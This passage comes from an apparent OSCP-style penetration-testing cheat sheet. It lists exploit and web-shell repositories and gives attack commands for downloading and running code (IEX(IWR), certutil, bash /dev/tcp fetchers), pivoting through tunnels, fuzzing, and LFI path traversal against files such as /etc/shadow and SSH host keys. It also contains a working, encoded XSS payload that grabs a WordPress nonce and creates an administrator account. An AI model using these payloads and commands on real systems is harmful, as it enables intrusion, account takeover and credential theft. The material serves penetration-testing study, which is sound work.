https://github.com/breenmachine/RottenPotatoNG | | n/a | RustPotato LPE | https://github.com/safedv/RustPotato | | n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato | | n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato | | n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato | | n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato | | n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato | ##### Exploit Collections | CVE | Descritpion | URL | | --- | --- | --- | | n/a | bin-sploits | https://gitlab.com/exploit-database/exploitdb-bin-sploits | | n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub | | n/a | Next.js v16.2.4 Exploit Collection | https://github.com/dwisiswant0/next-16.2.4-pocs | | n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits | | n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits | ### Payloads | Name | URL | | --- | --- | | Payload Box | https://github.com/payloadbox | | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | | phpgcc | https://github.com/ambionics/phpggc | | PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell| | webshell | https://github.com/tennc/webshell | | Web-Shells | https://github.com/TheBinitGhimire/Web-Shells | ### Wordlists | Name | URL | | --- | --- | | bopscrk | https://github.com/R3nt0n/bopscrk | | CeWL | https://github.com/digininja/cewl | | COOK | https://github.com/giteshnxtlvl/cook | | CUPP | https://github.com/Mebus/cupp | | Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists | | SecLists | https://github.com/danielmiessler/SecLists | | Username Anarchy | https://github.com/urbanadventurer/username-anarchy | ### Reporting | Name | URL | | --- | --- | | OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault | | SysReptor | https://github.com/Syslifters/sysreptor | | SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting | | SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ | ### Social Media Resources | Name | URL | | --- | --- | | OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x | | Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ | | HackTricks | https://book.hacktricks.xyz/ | | HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation | | Hacking Articles | https://www.hackingarticles.in/ | | Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ | | OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP | | OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 | | IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA | | IppSec.rocks | https://ippsec.rocks/?# | | 0xdf | https://0xdf.gitlab.io/ | ## Commands ### Basics #### curl curl -v http:// // verbose output curl -X POST http:// // use POST method curl -X PUT http:// // use PUT method curl --path-as-is http:///../../../../../../etc/passwd // use --path-as-is to handle /../ or /./ in the given URL curl --proxy http://127.0.0.1:8080 // use proxy curl -F myFile=@ http:// // file upload curl${IFS}/ // Internal Field Separator (IFS) example #### File Transfer ##### Certutil certutil -urlcache -split -f "http:///" ##### Netcat nc -lnvp > nc < ##### Impacket sudo impacket-smbserver ./ sudo impacket-smbserver . -smb2support copy * \\\ ##### PowerShell iwr / -o IEX(IWR http:///) -UseBasicParsing powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\ ##### Bash only ###### wget version Paste directly to the shell. function __wget() { : ${DEBUG:=0} local URL=$1 local tag="Connection: close" local mark=0 if [ -z "${URL}" ]; then printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \ "${FUNCNAME[0]}" "${FUNCNAME[0]}" return 1; fi read proto server path <<<$(echo ${URL//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST" [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT" [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC" exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3 while read line; do [[ $mark -eq 1 ]] && echo $line if [[ "${line}" =~ "${tag}" ]]; then mark=1 fi done <&3 exec 3>&- } __wget http:/// ###### curl version function __curl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } __curl http:/// > #### FTP ftp ftp -A wget -r ftp://anonymous:anonymous@ #### Kerberos sudo apt-get install krb5-kdc ##### Ticket Handling impacket-getTGT /:'' export KRB5CCNAME=.ccache export KRB5CCNAME='realpath .ccache' KRB5CCNAME=.ccache ##### Kerberos related Files /etc/krb5.conf // kerberos configuration file location kinit // creating ticket request klist // show available kerberos tickets kdestroy // delete cached kerberos tickets .k5login // resides kerberos principals for login (place in home directory) krb5.keytab // "key table" file for one or more principals kadmin // kerberos administration console add_principal // add a new user to a keytab file ksu // executes a command with kerberos authentication klist -k /etc/krb5.keytab // lists keytab file kadmin -p kadmin/ -k -t /etc/krb5.keytab // enables editing of the keytab file ##### Ticket Conversion ###### kribi to ccache base64 -d .kirbi.b64 > .kirbi impacket-ticketConverter .kirbi .ccache export KRB5CCNAME=`realpath .ccache` ###### ccache to kirbi impacket-ticketConverter .ccache .kirbi base64 -w0 .kirbi > .kirbi.base64 #### Ligolo-ng ##### Download Proxy and Agent ##### Prepare Tunnel Interface sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ##### Setup Proxy on Attacker Machine ./proxy -laddr :443 -selfcert ##### Setup Agent on Target Machine ./agent -connect :443 -ignore-cert ##### Configure Session ligolo-ng » session [Agent : user@target] » ifconfig sudo ip r add 172.16.1.0/24 dev ligolo or sudo ip route add 240.0.0.1/32 dev ligolo [Agent : user@target] » start ##### Port Forwarding [Agent : user@target] » listener_add --addr : --to : --tcp ##### Alternative Session Configuration ###### Setup Proxy on Attacker Machine sudo ./proxy -selfcert ###### Prepare Tunnel Interface ligolo-ng » ifcreate --name ligolo ###### Add Route to Tunnel Interface ligolo-ng » route_add --name ligolo --route ###### Setup Agent on Target Machine Start-Process -FilePath ".\agent.exe" -ArgumentList "-connect :11601 -ignore-cert" -WindowStyle Hidden #### Linux ##### CentOS doas -u /bin/sh ##### Environment Variables export PATH=`pwd`:$PATH ##### gcc gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit i686-w64-mingw32-gcc -o main32.exe main.c x86_64-w64-mingw32-gcc -o main64.exe main.c ##### getfacl getfacl ##### iconv echo "" | iconv -t UTF-16LE | base64 -w 0 echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 iconv -f ASCII -t UTF-16LE .txt | base64 | tr -d "\n" ##### vi :w !sudo tee % # save file with elevated privileges without exiting ##### Windows Command Formatting echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 #### Microsoft Windows ##### dir dir /a dir /a:d dir /a:h dir flag* /s /p dir /s /b *.log #### NFS sudo mount -t nfs -o vers=4,nolock :/ /PATH/TO/FOLDER/ #### PHP Webserver sudo php -S 127.0.0.1:80 #### Ping ping -c 1 ping -n 1 #### Port Forwarding ##### Chisel | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | ###### Reverse Pivot - LHOST < APPLICATION SERVER ###### LHOST ./chisel server -p 9002 -reverse -v ###### APPLICATION SERVER ./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000 ###### SOCKS5 / Proxychains Configuration - LHOST > APPLICATION SERVER > NETWORK ###### LHOST ./chisel server -p 9002 -reverse -v ###### APPLICATION SERVER ./chisel client 192.168.50.10:9002 R:socks ##### Ligolo-ng | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### Download Proxy and Agent wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz ###### Prepare Tunnel Interface sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ###### Setup Proxy on LHOST ./proxy -laddr 192.168.50.10:443 -selfcert ###### Setup Agent on APPLICATION SERVER ./agent -connect 192.168.50.10:443 -ignore-cert ###### Configure Session ligolo-ng » session [Agent : user@target] » ifconfig sudo ip r add 172.16.50.0/24 dev ligolo [Agent : user@target] » start ###### Port Forwarding - LHOST < APPLICATION SERVER > DATABASE SERVER [Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp ##### Socat | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER ###### APPLICATION SERVER ip a ip r socat -ddd TCP-LISTEN:2345,fork TCP::5432 ###### LHOST psql -h -p 2342 -U postgres ##### SSH Tunneling ###### Local Port Forwarding | System | IP address | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### APPLICATION SERVER python3 -c 'import pty;pty.spawn("/bin/bash")' ssh @192.168.100.10 ip a ip r for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; ssh -N -L 0.0.0.0:4455:172.16.50.10:445 @10.10.100.20 ###### LHOST smbclient -p 4455 //172.16.50.10/ -U --password= ###### Dynamic Port Forwarding | System | IP address | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### APPLICATION SERVER python3 -c 'import pty;pty.spawn("/bin/bash")' ssh -N -D 0.0.0.0:9999 @10.10.100.20 ###### LHOST sudo ss -tulpn tail /etc/proxychains4.conf socks5 192.168.50.10 9999 proxychains smbclient -p 4455 //172.16.50.10/ -U --password= ###### Remote Port Forwarding | System | IP address | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST <-> FIREWALL <-> APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### LHOST sudo systemctl start ssh sudo ss -tulpn ###### APPLICATION SERVER python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 @192.168.50.10 ###### LHOST psql -h 127.0.0.1 -p 2345 -U postgres ###### Remote Dynamic Port Forwarding | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < APPLICATION SERVER > NETWORK ###### APPLICATION SERVER python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 9998 @192.168.50.10 ###### LHOST sudo ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20 ##### sshuttle | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### APPLICATION SERVER socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22 ###### LHOST sshuttle -r @192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24 smbclient -L //172.16.50.10/ -U --password= ##### ssh.exe | System | IP address | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > NETWORK ###### LHOST sudo systemctl start ssh xfreerdp3 /u: /p: /v:192.168.100.20 ###### WINDOWS JUMP SERVER where ssh C:\Windows\System32\OpenSSH\ssh.exe C:\Windows\System32\OpenSSH> ssh -N -R 9998 @192.168.50.10 ###### LHOST ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains psql -h 10.10.100.20 -U postgres ##### Plink | System | IP address | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER ###### LHOST find / -name plink.exe 2>/dev/null /usr/share/windows-resources/binaries/plink.exe ###### WINDOWS JUMP SERVER plink.exe -ssh -l -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10 ###### LHOST ss -tulpn xfreerdp3 /u: /p: /v:127.0.0.1:9833 ##### Netsh | System | IP address | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > DATABASE SERVER ###### LHOST xfreerdp3 /u: /p: /v:192.168.100.20 ###### WINDOWS JUMP SERVER netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20 netstat -anp TCP | findstr "2222" netsh interface portproxy show all netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow ###### LHOST sudo nmap -sS 192.168.50.10 -Pn -n -p2222 ssh database_admin@192.168.50.10 -p2222 ###### WINDOWS JUMP SERVER netsh advfirewall firewall delete rule name="port_forward_ssh_2222" netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10 #### Python Webserver sudo python -m SimpleHTTPServer 80 sudo python3 -m http.server 80 #### RDP xfreerdp3 /v: /u: /p: /cert-ignore xfreerdp3 /v: /u: /p: /d: /cert-ignore xfreerdp3 /v: /u: /p: +dynamic-resolution +clipboard xfreerdp3 /v: /u: /d: /pth:'' +dynamic-resolution +clipboard xfreerdp3 /v: +dynamic-resolution +clipboard /tls:seclevel:0 /sec:nla:off rdesktop #### showmount /usr/sbin/showmount -e sudo showmount -e chown root:root sid-shell; chmod +s sid-shell #### SMB mount.cifs /// /mnt/remote guestmount --add '//' --inspector --ro /mnt/ -v #### smbclient smbclient -L \\\ -N smbclient -L /// -N smbclient -L ///// -N smbclient -L //// -U % smbclient -U "" -L \\\\\\ smbclient /// smbclient /// -U smbclient ///SYSVOL -U % smbclient "\\\\\" smbclient \\\\\\ -U '' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 smbclient --no-pass /// ##### Download multiple files at once mask"" recurse ON prompt OFF mget * #### SSH ##### Using outdated Algorithms ssh user@ -oKexAlgorithms=+diffie-hellman-group1-sha1 ##### Error Handling ###### Fixing SSH Private Key dos2unix id_rsa vim --clean id_rsa chmod 600 id_rsa dos2unix id_rsa; vim --clean -c 'wq' id_rsa; chmod 600 id_rsa #### Time and Date ##### Get the Server Time sudo nmap -sU -p 123 --script ntp-info ##### Stop virtualbox-guest-utils to stop syncing Time sudo /etc/init.d/virtualbox-guest-utils stop ##### Stop systemd-timesyncd to sync Time manually sudo systemctl stop systemd-timesyncd ##### Disable automatic Sync sudo systemctl disable --now chronyd ##### Options to set the Date and Time ##### net time sudo net time -c sudo net time set -S sudo net time \\ /set /y ##### ntpdate sudo ntpdate sudo ntpdate -s sudo ntpdate -b -u ##### rdate sudo rdate -n sudo rdate -s ##### timedatectl sudo timedatectl show sudo timedatectl set-ntp false sudo timedatectl set-timezone UTC sudo timedatectl list-timezones sudo timedatectl set-timezone '/' sudo timedatectl set-time 15:58:30 sudo timedatectl set-time '2015-11-20 16:14:50' sudo timedatectl set-local-rtc 1 ##### Keep in Sync with a Server while [ 1 ]; do sudo ntpdate ;done #### Tmux ctrl b + w # show windows ctrl + " # split window horizontal ctrl + % # split window vertical ctrl + , # rename window ctrl + { # flip window ctrl + } # flip window ctrl + spacebar # switch pane layout Copy & Paste :setw -g mode-keys vi ctrl b + [ space enter ctrl b + ] Search ctrl b + [ # enter copy ctrl + / # enter search while within copy mode for vi mode n # search next shift + n # reverse search Logging ctrl b shift + P # start / stop Save Output ctrl b + : capture-pane -S - ctrl b + : save-buffer .txt #### Upgrading Shells python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + z stty raw -echo fg Enter Enter export XTERM=xterm or Ctrl + z stty -a stty raw -echo;fg Enter Enter stty rows 37 cols 123 // stty rows 50 columns 400 export TERM=xterm-256color bash Alternatively: script -q /dev/null -c bash /usr/bin/script -qc /bin/bash /dev/null ##### Oneliner stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ##### Error Handling ###### Fixing Staircase Effect env reset or stty onlcr #### uv uv add --script ##### XSS client-Side Attack ###### Request Example foobar! ###### Get nonce var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/user-new.php"; var nonceRegex = /ser" value="([^"]*?)"/g; ajaxRequest.open("GET", requestURL, false); ajaxRequest.send(); var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); var nonce = nonceMatch[1]; ###### Update Payload Script var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator"; ajaxRequest = new XMLHttpRequest(); ajaxRequest.open("POST", requestURL, true); ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajaxRequest.send(params); ###### Compress Payload Script var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params); ##### Encoding Function function encode_to_javascript(string) { var input = string var output = ''; for(pos = 0; pos < input.length; pos++) { output += input.charCodeAt(pos); if(pos != (input.length - 1)) { output += ","; } } return output; } let encoded = encode_to_javascript('var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params);') console.log(encoded) ###### Encoded Payload 118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9 ###### Execution curl -i http:// --user-agent "" --proxy 127.0.0.1:8080 #### ffuf ##### Common Commands ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." -u http:/// -ac ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." -u http:/// -fs 185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http:///backups/backup_2020070416FUZZ.zip ##### Using a Request File ffuf -request -w /usr/share/wordlists/dirb/common.txt ##### API Fuzzing ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412 ##### Searching for LFI ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ##### Fuzzing with PHP Session ID ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ##### Recursion ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/basic/FUZZ -recursion ##### File Extensions ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ##### Rate Limiting ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429 ##### Virtual Host Discovery ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u http:// -ac ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u http:// -fs 1495 ##### Massive File Extension Discovery ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip #### GitTools ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/ #### Gobuster -e // extended mode that renders the full url -k // skip ssl certificate validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --wildcard // set wildcard option gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x php gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://:/ -b 200 -k --wildcard ##### Common File Extensions txt,bak,php,html,js,asp,aspx ##### Common Picture Extensions png,jpg,jpeg,gif,bmp ##### POST Requests gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http:///api/ -e -s 200 ##### DNS Recon gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt ##### VHost Discovery gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain ##### Specifiy User Agent gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux #### Local File Inclusion (LFI) http:///.php?file= http:///.php?file=../../../../../../../../etc/passwd http:////php?file=../../../../../../../../../../etc/passwd ##### Until php 5.3 http:////php?file=../../../../../../../../../../etc/passwd%00 ##### Null Byte %00 0x00 ##### Encoded Traversal Strings ../ ..\ ..\/ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ ##### php://filter Wrapper url=php://filter/convert.base64-encode/resource=file:////var/www//api.php http:///index.php?page=php://filter/convert.base64-encode/resource=index http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd base64 -d .php ##### Django, Rails, or Node.js Web Application Header Values Accept: ../../../../.././../../../../etc/passwd{{ Accept: ../../../../.././../../../../etc/passwd{%0D Accept: ../../../../.././../../../../etc/passwd{%0A Accept: ../../../../.././../../../../etc/passwd{%00 Accept: ../../../../.././../../../../etc/passwd{%0D{{ Accept: ../../../../.././../../../../etc/passwd{%0A{{ Accept: ../../../../.././../../../../etc/passwd{%00{{ ##### Linux Files /app/etc/local.xml /etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow /etc/at.deny /etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny /etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts /etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini /etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf /etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release /etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf /etc/network/interfaces /etc/networks /etc/npasswd /etc/passwd /etc/php4.4/fcgi/php.ini /etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini /etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini /etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini /etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf /etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf /etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf /etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf /opt/xampp/etc/php.ini /proc/cmdline /proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules /proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps /proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat /proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini /usr/local/apache/log 